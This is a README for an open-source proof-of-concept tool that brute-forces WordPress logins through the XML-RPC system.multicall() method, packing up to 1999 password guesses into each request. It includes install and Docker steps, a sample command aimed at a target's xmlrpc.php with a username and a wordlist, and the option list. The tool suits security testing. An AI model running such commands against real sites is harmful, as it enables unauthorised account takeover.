This script is a PoC
for the Brute Force Amplification Attack exploit against XMLRPC
interfaces enabling the _system.multicall()_
method (enabled by default).
The _system.multicall()_
method allows multiple calls to be sent within a single HTTP
request. Using this "wrapper", malicious attackers can carry out a large number of login attempts (bruteforce) with a minimal network impact, consequently making them stealthier and more efficient.
At the moment, the maximum number of calls which can be encapsulated within the _system.multicall()_
method without triggering a networking error is 1999
calls meaning that for each HTTP
request sent 1999
different login attempts are performed.
More information about the bruteforce amplification attack can be found at:
Important
This script has been sucessfully tested against WordPress versions < 4.4.
-
Download this repository:
git clone https://github.com/AresS31/xmlrpc-bruteforcer cd .\xmlrpc-bruteforcer
-
Install the dependencies:
pip install -r requirements.txt
cd .\xmlrpc-bruteforcer
docker build -t xmlrpc-bruteforcer .
docker run --rm -v $(pwd):/wordlists xmlrpc-bruteforcer -u admin -w /wordlists/wordlist.txt -t 3 -x https://wordpress.local/xmlrpc.php
python3 xmlrpc-bruteforce.py -u [username] -w [wordlist] -x [xmlrpc_intf] -t [threads_number] -c [chunks_size] -v [verbose] -h [help]
[-u]: username of the targeted user, required
[-w]: wordlist containing the passwords to try, required
[-x]: xmlrpc interface to attack, required
[-t]: number of threads to run, optional, default value: 5
[-c]: number of calls to encapsulate within a system.mullticall() call, optional, default value: 1999
[-v]: print debugging information, optional, default value: False
[-h]: print help
- Debug the
tqdm
andsys.stdout
printing issues. - Improve the quality of the source code.
If you want to support this project and appreciate the time invested in developping, maintening and extending it; consider donating toward my next cup of coffee. ☕
It is easy, all you got to do is press the Sponsor
button at the top of this page or alternatively click this link. 💸
Found a bug? I would love to squash it! 🐛
Please report all issues on the GitHub issues tracker.
You would like to contribute to better this project? 🤩
Please submit all PRs
on the GitHub pull requests tracker.
See LICENSE.